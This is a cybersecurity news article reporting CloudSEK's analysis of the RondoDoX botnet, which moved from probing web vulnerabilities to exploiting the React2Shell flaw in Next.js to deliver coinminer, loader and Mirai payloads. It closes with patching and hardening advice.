Analysis of exposed command-and-control (C2) logs from March to December 2025 revealed how the threat actors evolved their attacks, shifting from probing common web vulnerabilities to deploying full-fledged malware operations.
The campaign recently escalated as the attackers began exploiting the newly disclosed React2Shell vulnerability affecting Next.js Server Actions.
Darktrace first reported live exploitation of React2Shell on December 10, 2025. Within three days, CloudSEK observed the RondoDoX group switching to fresh infrastructure and continuing their attacks using updated C2 servers and payloads.
The group demonstrated remarkable agility, integrating the latest vulnerabilities into their toolset almost immediately after public disclosure, reflecting a high level of automation and adaptation.
CloudSEK’s Threat Research and Information Analysis Division (TRIAD) confirmed that the campaign unfolded in three primary phases.
The first phase, running between March and April 2025, involved manual reconnaissance and vulnerability testing targeting platforms such as WebLogic, along with probing for SQL injection and command execution.
By April, the second phase had begun, characterized by automated web exploitation across content management systems such as WordPress, Drupal, and Apache Struts2.
During this period, the threat actors also expanded to IoT ecosystems, focusing on routers and network devices through abused diagnostic commands.
The third phase, beginning in July 2025, saw the emergence of dedicated RondoDoX botnet infrastructure and large-scale infection waves. Logs from the compromised servers confirm persistent automated deployment activity, with hourly exploitation attempts by December.
At least six C2 servers were identified, each responsible for distributing separate malware variants and controlling infected systems across multiple geographies.
The latest stage of this campaign leverages the React2Shell vulnerability in Next.js Server Actions. Attackers initiated blind remote code execution testing on December 8, 2025, followed by full weaponization a few days later.
Once a server was confirmed vulnerable, the threat actors executed Node.js commands to download and launch payloads from their active C2 infrastructure.
The downloaded binaries, internally referred to as “nuts” payloads, included a Linux coinminer named “poop,” a persistent loader and system enforcer called “bolts,” and an IoT-specific Mirai variant labeled “x86.”
These payloads support multiple architectures, including x86, ARM, and MIPS, and use fallback delivery methods such as wget, curl, and TFTP to ensure stable deployment.
The ongoing activity highlights the growing convergence between web application exploitation and IoT botnet operations.
CloudSEK has advised organizations to immediately patch all vulnerable Next.js applications, harden IoT environments, and block known malicious IP addresses associated with the RondoDoX botnet to prevent further compromise.
Follow us on Google News , LinkedIn and X to Get More Instant Updates, Set Cyberpress as a Preferred Source in Google.
The post RondoDoX Botnet Actively Weaponizes Critical React2Shell Flaw for Malware Deployment appeared first on Cyber Security News.
DETROIT — An urgent investigation is underway in Detroit after multiple students were hospitalized this…
LANSING, Mich. — A major budget standoff is now underway in Michigan after state Senate…
STARKE COUNTY, IND. (WOWO) A former employee of the Starke County Sheriff’s Department has pleaded…
The status of New Hampshire’s end to mandatory car inspections might still be murky in…
Five major dairy farms populated the half-mile stretch of Upper City Road in Pittsfield where…
Resident Evil Requiem players were sad to see the Merchant left out of Leon's latest…
This website uses cookies.